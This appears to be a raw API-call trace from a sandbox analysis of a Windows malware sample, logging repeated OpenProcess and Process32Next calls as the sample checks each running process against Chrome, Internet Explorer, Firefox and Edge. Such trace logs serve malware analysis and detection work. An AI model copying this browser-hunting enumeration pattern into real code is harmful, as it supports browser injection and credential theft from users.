	[0237.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x79c8
	[0237.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.055] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.055] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.056] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.056] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.057] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x79cc
	[0237.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.059] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.060] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.060] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.061] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0237.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x79d0
	[0237.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.062] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0237.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.063] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.063] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0237.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.064] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.064] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x79d4
	[0237.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.066] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.066] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.067] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.067] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0237.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x79d8
	[0237.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.069] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0237.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.069] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.070] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0237.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.070] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0237.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x79dc
	[0237.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.072] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0237.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.073] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.073] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0237.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.075] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.075] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0237.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x79e0
	[0237.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.076] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0237.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.077] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.077] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0237.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.078] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.078] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0237.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x79e4
	[0237.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.079] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.080] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.080] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.081] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.081] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.082] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x79e8
	[0237.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.082] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.083] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.083] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.084] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.084] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x79ec
	[0237.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.086] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.087] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.087] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.088] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x79f0
	[0237.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.089] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.091] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.092] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.092] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.092] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.094] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x79f4
	[0237.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.094] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.094] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.095] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.095] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.096] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x79f8
	[0237.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.097] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.098] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.098] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.099] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.099] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.099] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.100] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x79fc
	[0237.100] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.101] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.101] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.101] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.102] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.102] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.102] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.102] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.104] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7a00
	[0237.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.104] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.104] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.104] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.108] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.109] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0237.110] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7a04
	[0237.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.110] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0237.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.111] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.111] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0237.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.112] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7a08
	[0237.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.114] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.114] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.115] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.115] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.115] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0237.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7a0c
	[0237.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.117] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.117] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.118] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.119] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7a10
	[0237.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.120] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.122] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.123] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.123] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.123] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7a14
	[0237.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.125] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.125] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.126] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.126] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7a18
	[0237.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.128] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.129] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.129] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.130] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0237.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7a1c
	[0237.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.132] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0237.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.132] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.133] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0237.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.133] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0237.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7a20
	[0237.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.135] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.135] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.136] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.141] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.141] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0237.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7a24
	[0237.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.143] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0237.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.143] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.144] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0237.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.145] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0237.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0237.147] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0237.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7a28
	[0237.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.148] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0237.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.149] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
